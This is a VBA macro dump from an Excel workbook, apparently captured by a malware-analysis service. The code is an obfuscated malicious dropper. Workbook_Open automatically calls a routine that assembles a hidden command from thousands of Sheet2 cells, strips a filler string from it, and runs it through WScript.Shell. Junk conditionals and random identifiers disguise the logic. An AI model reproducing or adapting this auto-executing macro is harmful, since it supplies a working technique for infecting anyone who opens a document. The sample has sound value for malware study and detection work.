Attribute VB_Name = "LsnyhKN"
#If VBA7 Then
Private Declare PtrSafe Function zx Lib "user32" Alias "GetPropA" (ByVal vb As Long, ByVal za As String) As Long
Private Declare PtrSafe Function vz Lib "kernel32" Alias "lstrcpyA" (ByVal vb As String, ByVal za As Long) As Long
#Else
Private Declare  Function zx Lib "user32" Alias "GetPropA" (ByVal vb As Long, ByVal za As String) As Long
Private Const phtohuuibyygektidcpfgh = 68
Const zshqd = 1
Private Declare  Function vz Lib "kernel32" Alias "lstrcpyA" (ByVal vb As String, ByVal za As Long) As Long
#End If

Private Type iga
     nfsgwrihatkjzwmbljpyqzzrenagvdfi As Long
End Type


#If VBA7 Then


#Else


#End If




Public Sub nuzXAzEX()

On Error Resume Next


If 9.40887233778837E+15 > 951093920949# Then


Dim zdrwfible As Long


zdrwfible = (424332 - 5) / 15


If IsDate(bfnwlgxpzgxusiphxrzj) And ((2 + 93152) / (82915 + 35)) <> 9.40887233778837E+15 Then

End If



End If


If 35 > 17543873577# Then


Dim owmwchipqmbujoiavcbqaqxrfhwccncznlfq As Long


owmwchipqmbujoiavcbqaqxrfhwccncznlfq = (17543873577# - 93152) / 424332


If IsDate(bfnwlgxpzgxusiphxrzj) And ((2 + 93152) / (82915 + 35)) <> 9.40887233778837E+15 Then

End If



End If




Dim kll
bbb = Left("0187654324567786543jhgfddfghkjgfdsjhgfbdcs4532", 1)

Dim x As String
Dim cur(841300) As String
Dim iC As Integer
Worksheets("Sheet2").Activate
Range("F1").Activate
For iC = 0 To 8962
cur(iC) = ActiveCell.Offset(iC, 1).Value
Next iC
For iC = 0 To 8962
x = x & cur(iC)
Next iC
x = Replace(x, "epsoirqwxmfxcmarvvyra", "")
If Sin(0) = Sin(1) Then
Dim k As String
Dim o As Variant
MsgBox (x)
Else
Dim k1 As String
Dim o1 As Variant
End If
Set er = CreateObject("WScript.Shell")
er.Run x, bbb


End Sub





Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Private Sub Workbook_Open()
Call zx
End Sub


Private Sub zx()


If 9# + Sin(1) = Log(1) + Cos(3.5) Then




Else

While "U4sp" = "65"

Wend



Call LsnyhKN.nuzXAzEX

End If


End Sub


' InQuest injected base64 decoded content
' zKbu

INQUEST-PP=macro
